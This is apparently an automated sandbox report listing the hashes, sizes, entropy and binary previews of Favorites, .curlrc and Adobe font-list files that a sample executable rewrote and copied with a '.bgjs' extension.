                                                                                                                                      Preview:[{000Xn.A..*..b....I.a..K.OeO*.3C...DM....'....xa.%.6-.D.....X.xh.z`.<.S2..t..t..&..*;....M.`j.F.....P2b.w...D.H.....(.GMm........$...J.....wX..."..D...E.Z.Z.B....e........k.)!.Qz.._:{.n1...X......})...4..k......3$....Z.L`...B..T?>..3].sH._..^..U.............Kr.N.k.YH....N....q...[.b*E...&.....y...:.hz;..Wr&.R..BA..m...N.~.....OV.....:....u.....tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\Favorites\Google.url

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):445
                                                                                                                                      Entropy (8bit):7.448386793519432
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:PWaUWQIvxz120B/K/JcG/4kB6aHFdukIcii9a:PWsQoQn3tIbD
                                                                                                                                      MD5:A08FEBB148A518FFC55FA1DE2C8A86CE
                                                                                                                                      SHA1:6E9D9797CE6FF3E657E1596E0C8D01CDB797BC09
                                                                                                                                      SHA-256:7742B414B28B1F552E2E6AFFE79A9EBCAAE5ACC775277D14EBC014B6A5E93F04
                                                                                                                                      SHA-512:1940567160295E66767AC4E3D2058657D39669D7E2101AF72FBE30EA71874E3BFDB1F72EAAEB0DDC71C55ECA895F1B0D25A7D5D5D875AC17D72C3244703CDAC2
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:[{000..rnu._l....5.........+.....p..l..2H......}..!...dO.EAb.6P....V..&..J.E..;.....k-7.$&.!...4.?..$.Cj..{G...c..X0A..MVN..J.}.9.{.l.-.D...e.)!...}.f.p.2o....<....._....f.I..Qw.l..[O....).M.a........N..@F..iEC.......(.8.i$..-......)+.%.{e...n....>...{...A.^:T.V.=.f.Ve6...j!.....b...v.%.DI.OX.....B.I5.'..kM.$......P...j....... ....,..84..Wi......tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\Favorites\Google.url.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):445
                                                                                                                                      Entropy (8bit):7.448386793519432
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:PWaUWQIvxz120B/K/JcG/4kB6aHFdukIcii9a:PWsQoQn3tIbD
                                                                                                                                      MD5:A08FEBB148A518FFC55FA1DE2C8A86CE
                                                                                                                                      SHA1:6E9D9797CE6FF3E657E1596E0C8D01CDB797BC09
                                                                                                                                      SHA-256:7742B414B28B1F552E2E6AFFE79A9EBCAAE5ACC775277D14EBC014B6A5E93F04
                                                                                                                                      SHA-512:1940567160295E66767AC4E3D2058657D39669D7E2101AF72FBE30EA71874E3BFDB1F72EAAEB0DDC71C55ECA895F1B0D25A7D5D5D875AC17D72C3244703CDAC2
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:[{000..rnu._l....5.........+.....p..l..2H......}..!...dO.EAb.6P....V..&..J.E..;.....k-7.$&.!...4.?..$.Cj..{G...c..X0A..MVN..J.}.9.{.l.-.D...e.)!...}.f.p.2o....<....._....f.I..Qw.l..[O....).M.a........N..@F..iEC.......(.8.i$..-......)+.%.{e...n....>...{...A.^:T.V.=.f.Ve6...j!.....b...v.%.DI.OX.....B.I5.'..kM.$......P...j....... ....,..84..Wi......tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\Favorites\Live.url

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):443
                                                                                                                                      Entropy (8bit):7.460735957700651
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:uCv1l2Xz/wDRu6hfGdgg4AHUSB1bN/ajDukIcii9a:uCv1lwzoNb8dgM0SBlc8bD
                                                                                                                                      MD5:15E09C6A3521279F7866A072C7543DBF
                                                                                                                                      SHA1:EEBD808CDC845079C22B5D7E32A4902D2FEC995E
                                                                                                                                      SHA-256:F7CDEB3F06CA947DF075561589EBDEF1734AA3B3FA03A3E47D18EFA3890F6951
                                                                                                                                      SHA-512:CAD7EED0A35586643DC1784510A891036E358AD55E24DC7FA2516080D7BF0EA3EE02B1EBEC0BBD30344E283E97523C6FAAE969E76CD32088D4F0EA5085AAF606
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:[{000........d!.....+........1..bDq..?X......@X....Y......xp()..Co...$Fj..7..wy...8..r....D......+...5"f..W.|..i.7.K.p.]C.Z...B..xZ.......E.A.u..:t.....!..NS..u.......PU..0.A..K.:....^...$.....S$..E[`.3...n.{...x..9....P.$ r..P..u...v...i.......z.V..j..s..D..m.y//..xj1.eA.k~..%..Q..d.-^....`.I.....c....W.} ....?.. "r.J...@.....f."].)g.0..tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\Favorites\Live.url.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):443
                                                                                                                                      Entropy (8bit):7.460735957700651
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:uCv1l2Xz/wDRu6hfGdgg4AHUSB1bN/ajDukIcii9a:uCv1lwzoNb8dgM0SBlc8bD
                                                                                                                                      MD5:15E09C6A3521279F7866A072C7543DBF
                                                                                                                                      SHA1:EEBD808CDC845079C22B5D7E32A4902D2FEC995E
                                                                                                                                      SHA-256:F7CDEB3F06CA947DF075561589EBDEF1734AA3B3FA03A3E47D18EFA3890F6951
                                                                                                                                      SHA-512:CAD7EED0A35586643DC1784510A891036E358AD55E24DC7FA2516080D7BF0EA3EE02B1EBEC0BBD30344E283E97523C6FAAE969E76CD32088D4F0EA5085AAF606
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:[{000........d!.....+........1..bDq..?X......@X....Y......xp()..Co...$Fj..7..wy...8..r....D......+...5"f..W.|..i.7.K.p.]C.Z...B..xZ.......E.A.u..:t.....!..NS..u.......PU..0.A..K.:....^...$.....S$..E[`.3...n.{...x..9....P.$ r..P..u...v...i.......z.V..j..s..D..m.y//..xj1.eA.k~..%..Q..d.-^....`.I.....c....W.} ....?.. "r.J...@.....f."].)g.0..tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\Favorites\NYTimes.url

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):446
                                                                                                                                      Entropy (8bit):7.386126871124517
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:B6GNo/qYNNHnl825xFunDL9r07KYgbtSqaYukIcii9a:AttK1r07KPtSB7bD
                                                                                                                                      MD5:B13424F30B51A5E941834E14E25CAFFD
                                                                                                                                      SHA1:6831E7D62C2F54F569452008BF8E5999C54C7AE1
                                                                                                                                      SHA-256:FB487F9F91AB4EABF39BDA552E0AB0BF680A029AE35555817A43098B7918DEA1
                                                                                                                                      SHA-512:1D472B8127F49DB9196EA1400E4308D3AEE38068A91E48B85CA1D9DDC561ABCF5B44CECEF62D947D91DF204C680B8FAF6A18EE4EB8640D737AFF1A1D9112D0CB
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:[{000............G.1...g..5E..G...@m...h7.~.t..a...v.7..SW....7....+..i..}.........<..C}.x.'...\.....]..[..s.K.........{."s...>K^..K...{.p.U....I"_.xZ.T.Z.202..e.....6./{H*.r.<...i>;4.9./sC..<*.a...v...........e?..j.eR[H6~...1..a.[.;.V.X...H...S.....0.cBd.X..?.i...(?.M.4......D.c.U>....U2e.|..VB.'bGd....[./......\.J._....p...[P...L.1....}B.|.cp.0....tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\Favorites\NYTimes.url.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):446
                                                                                                                                      Entropy (8bit):7.386126871124517
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:B6GNo/qYNNHnl825xFunDL9r07KYgbtSqaYukIcii9a:AttK1r07KPtSB7bD
                                                                                                                                      MD5:B13424F30B51A5E941834E14E25CAFFD
                                                                                                                                      SHA1:6831E7D62C2F54F569452008BF8E5999C54C7AE1
                                                                                                                                      SHA-256:FB487F9F91AB4EABF39BDA552E0AB0BF680A029AE35555817A43098B7918DEA1
                                                                                                                                      SHA-512:1D472B8127F49DB9196EA1400E4308D3AEE38068A91E48B85CA1D9DDC561ABCF5B44CECEF62D947D91DF204C680B8FAF6A18EE4EB8640D737AFF1A1D9112D0CB
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:[{000............G.1...g..5E..G...@m...h7.~.t..a...v.7..SW....7....+..i..}.........<..C}.x.'...\.....]..[..s.K.........{."s...>K^..K...{.p.U....I"_.xZ.T.Z.202..e.....6./{H*.r.<...i>;4.9./sC..<*.a...v...........e?..j.eR[H6~...1..a.[.;.V.X...H...S.....0.cBd.X..?.i...(?.M.4......D.c.U>....U2e.|..VB.'bGd....[./......\.J._....p...[P...L.1....}B.|.cp.0....tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\Favorites\Reddit.url

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):445
                                                                                                                                      Entropy (8bit):7.362941652876057
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:t1IBCNdYuAgxPd1MG72l+guhjukIcii9a:LcMd6GCv7bD
                                                                                                                                      MD5:DA355EC824E0E06F9BF40E7204C29D72
                                                                                                                                      SHA1:C7783E2980A22D86B80DAA5305844554A3443883
                                                                                                                                      SHA-256:FA53BB5A6A0F2D9823DA0C30230F3CE0578A12A4933129D92708447A2FCD9BD3
                                                                                                                                      SHA-512:4C70A2BA373A6C58992E83B87226174A49DA8B403D36E98C354451430A4CA6BA14DD8B335D75EEC3A29C984444F7DECDF5BDFB6145C330F51C1FCC4E4794A068
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:[{000.._...!j..I..x..ER.T..:7..}i.2.m.0*.XI..=.>..&.2.In.T...Z..O./Lu....`...iP....#. .]Hzm.A.[.m.G...v.`.)...p...o.....T.k.*..hve.".58F.{.ins.{.@.1..R9F.......H.\rPE.yu..k@....0....<....P.....8....s..."..9..jd.YK..Hl.R.Ak...O.>T?.T.S,.F..;..3.8.`.J.....Wj..^..-...I..S.............X......I...f.A|. ..X.C.nP.X.0....Z.C[..Yy.......:.}&*.~...*.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\Favorites\Reddit.url.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):445
                                                                                                                                      Entropy (8bit):7.362941652876057
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:t1IBCNdYuAgxPd1MG72l+guhjukIcii9a:LcMd6GCv7bD
                                                                                                                                      MD5:DA355EC824E0E06F9BF40E7204C29D72
                                                                                                                                      SHA1:C7783E2980A22D86B80DAA5305844554A3443883
                                                                                                                                      SHA-256:FA53BB5A6A0F2D9823DA0C30230F3CE0578A12A4933129D92708447A2FCD9BD3
                                                                                                                                      SHA-512:4C70A2BA373A6C58992E83B87226174A49DA8B403D36E98C354451430A4CA6BA14DD8B335D75EEC3A29C984444F7DECDF5BDFB6145C330F51C1FCC4E4794A068
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:[{000.._...!j..I..x..ER.T..:7..}i.2.m.0*.XI..=.>..&.2.In.T...Z..O./Lu....`...iP....#. .]Hzm.A.[.m.G...v.`.)...p...o.....T.k.*..hve.".58F.{.ins.{.@.1..R9F.......H.\rPE.yu..k@....0....<....P.....8....s..."..9..jd.YK..Hl.R.Ak...O.>T?.T.S,.F..;..3.8.`.J.....Wj..^..-...I..S.............X......I...f.A|. ..X.C.nP.X.0....Z.C[..Yy.......:.}&*.~...*.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\Favorites\Twitter.url

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):446
                                                                                                                                      Entropy (8bit):7.3913346827761615
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:wyqJqCCuS/iPwui9b12nVmG8rvXGFpukIcii9a:wHqCcnuWAn8G8SFObD
                                                                                                                                      MD5:F6A59824C17C6250B65382ACC05581CC
                                                                                                                                      SHA1:74B20EAA4284912AAC4A3269C8253164B0FAB033
                                                                                                                                      SHA-256:21963264939DAC7C06EC782F1D7D8886E1C17173514C0B020FF3DA928BE25EE2
                                                                                                                                      SHA-512:92C912A137985F1B769BEDAD3AE199D95AB6E68128FB7DE23AE48F3AD0DDF50AD9E0CC6278B3B1C7733BF2ED4C2B5EDDE3C57BED56827621F4FEC89D2CBAD824
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:[{000.i+...9B.8.6..\.I.......W[.......5mL.9.].[l.3@....Ze-....,.....EYw.7.4 ....."..8..Q.7...>T....mP[.Tq.SZ..........n..#..D.?..$........3.....mQh.....]=.[RD.m.0..<...s.H..u.5.V......V9(.../....X!.......(..l.'WcT.H.[l~.0>......H.*.......e..p...<...b....`..SZ"..m6@.y.W..4/..8.. e..}.).'...#;e>OlV{.d.7....\'.Xb.t.....{\.b.DE..4.....`.S.TC..S.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\Favorites\Twitter.url.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):446
                                                                                                                                      Entropy (8bit):7.3913346827761615
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:wyqJqCCuS/iPwui9b12nVmG8rvXGFpukIcii9a:wHqCcnuWAn8G8SFObD
                                                                                                                                      MD5:F6A59824C17C6250B65382ACC05581CC
                                                                                                                                      SHA1:74B20EAA4284912AAC4A3269C8253164B0FAB033
                                                                                                                                      SHA-256:21963264939DAC7C06EC782F1D7D8886E1C17173514C0B020FF3DA928BE25EE2
                                                                                                                                      SHA-512:92C912A137985F1B769BEDAD3AE199D95AB6E68128FB7DE23AE48F3AD0DDF50AD9E0CC6278B3B1C7733BF2ED4C2B5EDDE3C57BED56827621F4FEC89D2CBAD824
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:[{000.i+...9B.8.6..\.I.......W[.......5mL.9.].[l.3@....Ze-....,.....EYw.7.4 ....."..8..Q.7...>T....mP[.Tq.SZ..........n..#..D.?..$........3.....mQh.....]=.[RD.m.0..<...s.H..u.5.V......V9(.../....X!.......(..l.'WcT.H.[l~.0>......H.*.......e..p...<...b....`..SZ"..m6@.y.W..4/..8.. e..}.).'...#;e>OlV{.d.7....\'.Xb.t.....{\.b.DE..4.....`.S.TC..S.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\Favorites\Wikipedia.url

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):448
                                                                                                                                      Entropy (8bit):7.4452318430886075
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:JC/DKfjgo6novtVwLVJ8IUVWkHHQqnuzi4Hm2woSvWu9OGP3ukIcii96Z:8kgo6XV7U5np8inZNuXuukIcii9a
                                                                                                                                      MD5:647EB36CA74879A9652377D4EC124B89
                                                                                                                                      SHA1:05268C6BDEC2337396BD2604BFC97B6A1DC1481C
                                                                                                                                      SHA-256:20FE5ACDD7E24276B06FC9AD4762AFCBA2D144943E87C613105A2AA6DF6A0FEB
                                                                                                                                      SHA-512:6D0E26BBA9A64CE6E598FD0A219CBA9F0068DF38CA860CFF87D5095BE31BBC7D9513B77B7725B950F9B0458B2B355A4E56F54A6CB63E0C576D300744D57115D8
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:[{000.HT.i.h.&..(%....NgA~?UZB:..tR.....T.X..t.qd.g.}..o.../...8.*.........B4..MS&.....2.x?F..'X....N.J...O..r:I.H.Fsl......d.....Q!..,...)-r..JT...l.C....OH.T?UD7.N...W..1/....Y., ..)...w..........c.{.A..K.{..t.;~e"...,......\ ......+........K..(.4.........U..7...t.........P..OL35.....a...(K...F.......g....48..q9..l.r...=.5...]w.e..L.I..p...Y..|Q..}..tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\Favorites\Wikipedia.url.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):448
                                                                                                                                      Entropy (8bit):7.4452318430886075
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:JC/DKfjgo6novtVwLVJ8IUVWkHHQqnuzi4Hm2woSvWu9OGP3ukIcii96Z:8kgo6XV7U5np8inZNuXuukIcii9a
                                                                                                                                      MD5:647EB36CA74879A9652377D4EC124B89
                                                                                                                                      SHA1:05268C6BDEC2337396BD2604BFC97B6A1DC1481C
                                                                                                                                      SHA-256:20FE5ACDD7E24276B06FC9AD4762AFCBA2D144943E87C613105A2AA6DF6A0FEB
                                                                                                                                      SHA-512:6D0E26BBA9A64CE6E598FD0A219CBA9F0068DF38CA860CFF87D5095BE31BBC7D9513B77B7725B950F9B0458B2B355A4E56F54A6CB63E0C576D300744D57115D8
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:[{000.HT.i.h.&..(%....NgA~?UZB:..tR.....T.X..t.qd.g.}..o.../...8.*.........B4..MS&.....2.x?F..'X....N.J...O..r:I.H.Fsl......d.....Q!..,...)-r..JT...l.C....OH.T?UD7.N...W..1/....Y., ..)...w..........c.{.A..K.{..t.;~e"...,......\ ......+........K..(.4.........U..7...t.........P..OL35.....a...(K...F.......g....48..q9..l.r...=.5...]w.e..L.I..p...Y..|Q..}..tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\Favorites\Youtube.url

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):446
                                                                                                                                      Entropy (8bit):7.439666409630278
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:hos4T4tkTIvvV4BUOu2BdTAQcqpAFm6GnukIcii9a:hoXAkTIVJOjnnsJfbD
                                                                                                                                      MD5:96CB9A4590D141410841D51C25316CF7
                                                                                                                                      SHA1:BBDE34628A22981FB6F1E5C2619C29FE65FA4F2D
                                                                                                                                      SHA-256:E7321F55F5F4702A06131CB2B3482554AF84BF7C981E333044D92E0F54FD7E20
                                                                                                                                      SHA-512:FB46533F2BF578CB3229E96EDF7CE48B1787269AE5216EEC8CC658A296DBCAE611ECEA549BFAA6B155789AE051A3A86583B641E7F43C179B7145FCB176A1E08E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:[{000O(.3F?..9u..qY.%w6-.P...[.....+?..K...fa....#.t[o?U?.;..G*..X......H ...=S..m `.9m.3...c.Zfi.....AS.d.........P.....lS.QI:..w..3.C.........!.#J./..&.f..%.\C.N.,\...{......n2;m.Ch@..."..M.f..Qb..~n.Ih.>......vr.........*6z..q.~z.6|].].,{.wv.kCi.9@=.x..8. ..5vZ&..j'......g..-.!".s.a.o...F.k.D0....\..-..x.l.>.SlNMuv...m..}.J.gV.Z$......0..d...{X.J.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\Favorites\Youtube.url.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):446
                                                                                                                                      Entropy (8bit):7.439666409630278
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:hos4T4tkTIvvV4BUOu2BdTAQcqpAFm6GnukIcii9a:hoXAkTIVJOjnnsJfbD
                                                                                                                                      MD5:96CB9A4590D141410841D51C25316CF7
                                                                                                                                      SHA1:BBDE34628A22981FB6F1E5C2619C29FE65FA4F2D
                                                                                                                                      SHA-256:E7321F55F5F4702A06131CB2B3482554AF84BF7C981E333044D92E0F54FD7E20
                                                                                                                                      SHA-512:FB46533F2BF578CB3229E96EDF7CE48B1787269AE5216EEC8CC658A296DBCAE611ECEA549BFAA6B155789AE051A3A86583B641E7F43C179B7145FCB176A1E08E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:[{000O(.3F?..9u..qY.%w6-.P...[.....+?..K...fa....#.t[o?U?.;..G*..X......H ...=S..m `.9m.3...c.Zfi.....AS.d.........P.....lS.QI:..w..3.C.........!.#J./..&.f..%.\C.N.,\...{......n2;m.Ch@..."..M.f..Qb..~n.Ih.>......vr.........*6z..q.~z.6|].].,{.wv.kCi.9@=.x..8. ..5vZ&..j'......g..-.!".s.a.o...F.k.D0....\..-..x.l.>.SlNMuv...m..}.J.gV.Z$......0..d...{X.J.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\Local Settings\.curlrc.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):342
                                                                                                                                      Entropy (8bit):7.21198386768036
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:KWu2PXo3M3im8Hun2MX+RT6L+8pMI8WHbc78z3r1UdI2z6G3ukIcii96Z:Ni3+i9HoNnpMI8C7r15AukIcii9a
                                                                                                                                      MD5:4CB2521FA6BC30E3BD96138E764A9C77
                                                                                                                                      SHA1:0D85CF8AB27B2ADAACED071816FF5E0D9AFBEFDC
                                                                                                                                      SHA-256:A372E68B106E11B1FC00AE18F0EE6449B1081435AA482326121FA2592ECCD254
                                                                                                                                      SHA-512:D942EC5568085463C02FBB3255244CACECCE64618790121301F5E32ADC7F02C88B144BCAD664F54829DB54BD2AFC99E3897BE998A72524CAE8554B399A2AA2C5
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:insecMS.Z..).......X..S...3.=...f.w..6.....x.Y.n.,...A.=K"c.a.v.....;...~8.E......]"..z..u....C.n.......TCW.n...)...t. . .B...........i.$D.).\].k>...c.+.....be....[>....%=>...N%.K}.vMY....=...Q.Gc..kX...G.....'.u..Km7........c2.5......%...3.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\Local Settings\Adobe\Acrobat\DC\AdobeCMapFnt23.lst.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:PostScript document text
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1567
                                                                                                                                      Entropy (8bit):7.864428334955491
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:Y2H0ukP6Are8z5eB9f61jMEpqJeIiUvK9EkNLv8NYYOWFPH5zlUSH/m5tCBOi6L2:tHTGrLef61gFWEkNiPb1eHCBOi0OD
                                                                                                                                      MD5:A5DB53A65735D47686F04457C6735087
                                                                                                                                      SHA1:D2BA7DAB96F8364D0C01255B2DC677376AD8DE6C
                                                                                                                                      SHA-256:60123DD1A7C29D4172BA5ACEBC4C4E990DDCB1A2CB8C615849DF8B2E0FF1433F
                                                                                                                                      SHA-512:2D4EF8D19BD8F5D915D6FD002A303AF8092F44B7D08FEF60C8E81E63CF0B37D5E795B8D6274F670FB8ED118A77F7F6A014E19CCE8599E1FCC790A5E9FDA538E7
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:%!Adou@a.vQ......{...z...E.2..^}f.z.,].g.Q.A.(.7..&.....8G..V....V.H...2z...ufwtJ5.B3..=.....6z._!..2.sc..m..,7..Rvc.71QF.&.$.Cc|...d.:...]@..A."i.....M.#..a}.VS<.F.l..g..B.X..!.7.o.k.*?....d.w..Om.$..B.....&..1&..\Q.(.].+=.*)U..n.^..+6V..NfF...C(....L..c.?......w.t....7L..T0O...s.. ..4f!(..<.>.Ab..YV...Oa.!Z.0}<(..%.g...b.a.b.....TIaIW.....3.YC.{.n...y..M.L..2..Z.!..)rYMl.!]....X...Y....8.....W.u5"C.$....|...B..+........M#tc.-...Su...;.>y]E.}.H.......on.....6q....H..+[x....0(...S...x.J.......<.h....k.X]..X![.A..O.<...X..jcDH[B...G....PM]<..N....mw.8..y....c.....O.0...g....,c......r..5.5....v".>.......m.Z.....3d..,e.....R88.{..6...%...q...'G.o..S.i.n..[........2. 6+...q....g....b........aI`7....E...p./..!..t...@.Z...o....'...@.1?9.)..C4.u...VQ..&.{p.....<h32...?..?I..$G....l.|....zl^W.1..7.M`.P.q6..+.>J=..Q.^.M....+.Z...H.,.o..t>B'..}..g...d85.^2......K.b.o.B.,...2p.Z................-...~..[r.#"Rv4B~.....s>.]<K..8..Y.jweW.;..

                                                                                                                                      C:\Users\user\Local Settings\Adobe\Acrobat\DC\AdobeSysFnt23.lst.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:PostScript document text
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):185433
                                                                                                                                      Entropy (8bit):7.876516367361401
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:iT/devjDCIwmcnYCunHjltAnHTJPUFJoHUW/tSsaLIHyd8cdSl7535VPFqcoIrnV:wQXCIRFnDlcuroHUdsdHypdm9PPsc1rV
                                                                                                                                      MD5:CFC27E52227225AD74D58BB7611C86E5
                                                                                                                                      SHA1:2643AF7A341B3881919C9D4D259C913A6D10A12D
                                                                                                                                      SHA-256:9DA5979B8C8B30642E7271159ED53C542A02F13DE3C5F94946857B92B85F07DE
                                                                                                                                      SHA-512:DA46D7EE563ECBA0E066C3C297DA8360E8C1113E6C32D123630ECF91DD41997D41B995B731A832CF207BF1EA628D35824AD248A6EB754CAB96F013EFBC91FBBD
                                                                                                                                      Malicious:false
